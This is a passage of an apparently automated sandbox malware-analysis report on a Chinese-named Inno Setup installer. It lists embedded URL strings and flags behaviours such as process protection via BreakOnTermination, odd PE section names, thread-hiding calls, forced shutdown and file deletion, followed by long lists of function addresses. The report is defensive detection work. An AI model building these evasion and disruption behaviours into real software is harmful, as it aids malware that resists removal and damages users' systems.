Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr	String found in binary or memory: http://ocsp.digicert.com0H
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr	String found in binary or memory: http://www.metalinker.org/
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr	String found in binary or memory: http://www.metalinker.org/basic_string::_M_construct
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr	String found in binary or memory: https://aria2.github.io/
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr	String found in binary or memory: https://aria2.github.io/Usage:
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr	String found in binary or memory: https://github.com/aria2/aria2/issues
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr	String found in binary or memory: https://github.com/aria2/aria2/issuesReport
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe	String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2080391705.000000007EF3B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2080019112.0000000003390000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000000.2082091796.00000000007C1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000000.2103564048.000000000115D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.dr	String found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2080391705.000000007EF3B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2080019112.0000000003390000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000000.2082091796.00000000007C1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000000.2103564048.000000000115D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.dr	String found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp

Process information set: 01 00 00 00

Jump to behavior

System Summary

PE file contains section with special chars

Source: update.vac.2.dr	Static PE information: section name: .=~
Source: hrsw.vbc.6.dr	Static PE information: section name: .=~
Source: update.vac.6.dr	Static PE information: section name: .=~

Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6C8A3886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,	6_2_6C8A3886
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CA25120 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle,	6_2_6CA25120
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6C8A3C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,	6_2_6C8A3C62
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6C8A3D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,	6_2_6C8A3D18
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CA25D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,	6_2_6CA25D60
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6C8A3D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,	6_2_6C8A3D62
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6C8A39CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread,	6_2_6C8A39CF
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6C8A3A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread,	6_2_6C8A3A6A

Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp

Code function: 6_2_6C8A1950: CreateFileA,DeviceIoControl,CloseHandle,

6_2_6C8A1950

Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp

Code function: 6_2_6C8A4754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor,

6_2_6C8A4754

Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6C8A4754	6_2_6C8A4754
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6C8B4A27	6_2_6C8B4A27
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CA21880	6_2_6CA21880
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CA26A43	6_2_6CA26A43
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CA86CE0	6_2_6CA86CE0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAF4DE0	6_2_6CAF4DE0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAD6D10	6_2_6CAD6D10
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CA58EA1	6_2_6CA58EA1
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAAAEEF	6_2_6CAAAEEF
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CADEEF0	6_2_6CADEEF0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CA72EC9	6_2_6CA72EC9
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAA4896	6_2_6CAA4896
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAEC8D0	6_2_6CAEC8D0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAE6820	6_2_6CAE6820
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CACE810	6_2_6CACE810
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAF4870	6_2_6CAF4870
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAF6999	6_2_6CAF6999
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAEA930	6_2_6CAEA930
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAD6900	6_2_6CAD6900
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAFA91A	6_2_6CAFA91A
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CA58972	6_2_6CA58972
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAE8950	6_2_6CAE8950
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAE4AA0	6_2_6CAE4AA0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAFAA00	6_2_6CAFAA00
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAB0A52	6_2_6CAB0A52
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CACAB90	6_2_6CACAB90
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CA60BCA	6_2_6CA60BCA
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAEEBC0	6_2_6CAEEBC0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CA70B66	6_2_6CA70B66
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAB84AC	6_2_6CAB84AC
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAE4489	6_2_6CAE4489
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CADE4D0	6_2_6CADE4D0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAD2580	6_2_6CAD2580
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CADC580	6_2_6CADC580
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAD45D0	6_2_6CAD45D0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAC2521	6_2_6CAC2521
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAE8520	6_2_6CAE8520
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAF46C0	6_2_6CAF46C0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAEE600	6_2_6CAEE600
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAE67A0	6_2_6CAE67A0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CABC7F3	6_2_6CABC7F3
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CA5C7CF	6_2_6CA5C7CF
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAF67C0	6_2_6CAF67C0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CADE0E0	6_2_6CADE0E0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAD0020	6_2_6CAD0020
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAEC2A0	6_2_6CAEC2A0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAE8200	6_2_6CAE8200
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAF5D90	6_2_6CAF5D90
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAA7D43	6_2_6CAA7D43
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAD3D50	6_2_6CAD3D50
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAD9E80	6_2_6CAD9E80
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAB1F11	6_2_6CAB1F11
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAC589F	6_2_6CAC589F
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAE78C8	6_2_6CAE78C8
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAD99F0	6_2_6CAD99F0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAD1AA0	6_2_6CAD1AA0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CACDAD0	6_2_6CACDAD0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CACFA50	6_2_6CACFA50
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CA7540A	6_2_6CA7540A
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CA9F5EC	6_2_6CA9F5EC
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CADF5C0	6_2_6CADF5C0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAD96E0	6_2_6CAD96E0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAEF640	6_2_6CAEF640
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CACB650	6_2_6CACB650
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAF37C0	6_2_6CAF37C0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAF9700	6_2_6CAF9700
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CA73092	6_2_6CA73092
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CADF050	6_2_6CADF050
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAD71F0	6_2_6CAD71F0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CADD280	6_2_6CADD280
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CADD380	6_2_6CADD380
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAE6AF0	6_2_6CAE6AF0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAE3750	6_2_6CAE3750
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B381EC	10_2_00B381EC
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B781C0	10_2_00B781C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B64250	10_2_00B64250
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B88240	10_2_00B88240
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B8C3C0	10_2_00B8C3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B804C8	10_2_00B804C8
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B68650	10_2_00B68650
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B6C950	10_2_00B6C950
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B40943	10_2_00B40943
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B68C20	10_2_00B68C20
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B84EA0	10_2_00B84EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B80E00	10_2_00B80E00
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B510AC	10_2_00B510AC
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B7D089	10_2_00B7D089
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B75180	10_2_00B75180
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B6D1D0	10_2_00B6D1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B891C0	10_2_00B891C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B81120	10_2_00B81120
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B8D2C0	10_2_00B8D2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B553F3	10_2_00B553F3
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00AF53CF	10_2_00AF53CF
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B3D496	10_2_00B3D496
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B854D0	10_2_00B854D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B8D470	10_2_00B8D470
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00AF1572	10_2_00AF1572
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B81550	10_2_00B81550
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B7D6A0	10_2_00B7D6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B49652	10_2_00B49652
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00AF97CA	10_2_00AF97CA
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B09766	10_2_00B09766
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B8D9E0	10_2_00B8D9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00AF1AA1	10_2_00AF1AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B75E80	10_2_00B75E80
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B75F80	10_2_00B75F80
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B0E00A	10_2_00B0E00A
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B722E0	10_2_00B722E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B92300	10_2_00B92300
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B5E49F	10_2_00B5E49F
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B725F0	10_2_00B725F0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B6A6A0	10_2_00B6A6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B666D0	10_2_00B666D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B8E990	10_2_00B8E990
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B72A80	10_2_00B72A80
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B4AB11	10_2_00B4AB11
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B76CE0	10_2_00B76CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B770D0	10_2_00B770D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B6B180	10_2_00B6B180
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B5B121	10_2_00B5B121
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B87200	10_2_00B87200
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B7F3A0	10_2_00B7F3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B1B3E4	10_2_00B1B3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B8F3C0	10_2_00B8F3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B7F420	10_2_00B7F420
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B67410	10_2_00B67410
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B8F599	10_2_00B8F599
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B83530	10_2_00B83530
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B9351A	10_2_00B9351A
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B6F500	10_2_00B6F500
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B93601	10_2_00B93601
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B63790	10_2_00B63790
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B877C0	10_2_00B877C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B1F8E0	10_2_00B1F8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B6F910	10_2_00B6F910
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B77AF0	10_2_00B77AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B43AEF	10_2_00B43AEF
